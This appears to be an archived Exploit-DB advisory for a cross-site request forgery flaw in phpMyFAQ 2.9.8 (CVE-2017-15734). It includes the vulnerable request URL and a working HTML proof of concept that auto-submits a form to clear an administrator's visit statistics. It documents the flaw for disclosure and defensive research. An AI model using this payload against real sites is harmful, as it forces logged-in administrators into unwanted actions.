← Back ⬡ Vulnerabilities & CVEs —

[webapps] phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)

Exploit DB Archived Mar 16, 2026 ✓ Full text saved

phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)

Full text archived locally

✦ AI Summary · Claude Sonnet

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF) EDB-ID: 52459 CVE: 2017-15734 EDB Verified: Author: CODESECLAB Type: WEBAPPS Exploit: / Platform: PHP Date: 2025-12-03 Vulnerable App: # Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/thorsten/phpMyFAQ # Software Link: https://github.com/thorsten/phpMyFAQ # Version: 2.9.8 # Tested on: Ubuntu Windows # CVE : CVE-2017-15734 PoC: Get http://phpmyfaq/admin/index.php?action=clear-visits Reproduction: While still logged in, open another browser window to access the link. Some Details: { "Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.", "File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php", "Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.", "Request Parameters": "action=clear-visits", "Request Method": "GET", "Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits", "Final PoC": "<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>" } [Replace Your Domain Name] Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services

💬 Team Notes